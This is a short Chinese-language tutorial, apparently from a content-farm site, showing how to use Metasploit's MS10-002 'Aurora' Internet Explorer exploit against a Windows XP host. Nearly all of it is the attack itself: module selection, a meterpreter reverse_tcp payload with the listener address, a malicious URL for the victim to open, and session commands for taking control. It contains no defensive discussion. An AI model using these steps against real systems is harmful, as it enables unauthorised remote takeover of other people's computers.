怎么进行Metasploit内网渗透的分析

这篇文章将为大家详细讲解有关怎么进行Metasploit内网渗透的分析，文章内容质量较高，因此小编分享给大家做个参考，希望大家阅读完这篇文章后对相关知识有一定的了解。

一、漏洞介绍

ms10_002漏洞，它是IE浏览器漏洞，也称“极光漏洞”，可以通过该漏洞获取目标主机的控制权。

二、攻击过程（目标主机是xp系统）

1、启动msf，搜索ms10_002

search ms10_002

2、选择模块

use exploit/windows/browser/ms10_002_aurora

3、设置payload

set payload windows/meterpreter/reverse_tcp

4、查看需要设置的参数

show options

5、设置监听的ip地址

set LHOST 192.168.1.133

6、攻击run，等待目标机连接

7、只要目标主机访问该连接，我们就可以获取该主机的控制权限

http://192.168.1.133:8080/cZQri76QWY9OhwC

8、指定要控制的目标主机：sessions -i 1

9、输入ipconfig，获取目标主机相关信息

关于怎么进行Metasploit内网渗透的分析就分享到这里了，希望以上内容可以对大家有一定的帮助，可以学到更多知识。如果觉得文章不错，可以把它分享出去让更多的人看到。